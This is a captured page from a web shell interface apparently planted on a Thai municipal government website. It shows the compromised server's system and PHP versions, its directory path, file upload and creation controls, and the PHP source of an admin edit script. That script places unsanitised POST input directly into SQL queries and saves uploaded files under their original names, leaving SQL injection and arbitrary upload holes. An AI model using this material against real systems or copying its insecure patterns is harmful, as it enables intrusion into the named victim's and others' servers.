Cylul007 Webshell
Uname
:
Linux ns7.thaihispeed.com 3.10.0-693.11.1.el7.x86_64 #1 SMP Mon Dec 4 23:52:40 UTC 2017 x86_64
PHP
:
5.3.29
on
apache2handler
Time
:
24 Nov 2024 20:34:54
Path :
/
home
/
tassabanlo
/
domains
/
lomsak.go.th
/
public_html
/
File Upload :
New File
New Folder
Current File : /home/tassabanlo/domains/lomsak.go.th/public_html/menu24_edit.php
Download
HOME
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" type="image/x-icon" href="images/favicon.ico" /> <title>สำนักงานเทศบาลเมืองหล่มสัก</title> </head> <? include "connect.php"; $menu_id24 = $_POST['menu_id24']; $fileupload=$_FILES['photo']['tmp_name']; $fileupload_name=$_FILES['photo']['name']; if($fileupload != ""){ if($img24 != ""){ unlink("./menu24/$img24"); } copy($fileupload,"./menu24/".$fileupload_name); $sql = "UPDATE menu24 SET menu_id24 = '$menu_id24',img24 = '$fileupload_name' WHERE menu_id24 = '$menu_id24' "; } else{ $sql="UPDATE menu24 SET menu_id24 = '$menu_id24' WHERE menu_id24 = '$menu_id24' "; } mysql_query($sql,$conn) or die("3.ไม่สามารถประมวลผลคำสั่งได้"); mysql_close(); echo"<script language=\"javascript\">"; echo"alert('บันทึกข้อมูลเรียบร้อยแล้ว');"; echo"window.location = 'menu24admin.php';"; echo"</script>"; ?> <body> <input name="menu_id24" type="hidden" id="menu_id24" value="<? echo $rs['menu_id24'] ; ?>" /> </body> </html>
Copyright © 2018 - Powered By CytoXploit